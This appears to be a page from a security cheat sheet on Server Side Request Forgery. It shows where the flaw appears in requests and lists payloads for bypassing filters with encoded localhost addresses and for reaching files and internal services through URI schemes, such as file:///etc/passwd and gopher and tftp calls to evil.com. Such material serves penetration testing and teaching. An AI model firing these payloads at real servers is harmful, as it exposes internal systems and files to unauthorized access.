Server Side Request Forgery (SSRF)

Introduction

Server Side Request Forgery is a web application vulnerability that allows attackers to make outgoing requests originating from the vulnerable server

Where to find

Usually it can be found in the request that contain request to another url, for example like this

POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com

urlApi=http://192.168.1.1%2fapi%2f&id=1

GET /image?url=http://192.168.1.1/
Host: example.com

How to exploit

Basic payload

http://127.0.0.1:1337
http://localhost:1337

Hex encoding

http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1

Octal encoding

http://127.0.0.1 -> http://0177.0.0.01

Dword encoding

http://127.0.0.1 -> http://2130706433

Mixed encoding

http://127.0.0.1 -> http://0177.0.0.0x1

Using URL encoding

http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74

Using IPv6

http://0000::1:1337/
http://[::]:1337/

Using bubble text

http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ

Use this https://capitalizemytitle.com/bubble-text-generator/

How to exploit (URI Scheme)

File scheme

file:///etc/passwd

Dict scheme

dict://127.0.0.1:1337/

FTP scheme

ftp://127.0.0.1/

TFTP scheme

tftp://evil.com:1337/test

SFTP scheme

sftp://evil.com:1337/test

LDAP scheme

ldap://127.0.0.1:1337/

Gopher scheme

gopher://evil.com/_Test%0ASSRF

References

Vickie Li

PreviousServer Side Include Injection (SSI Injection)NextMindmap

Last updated 2 years ago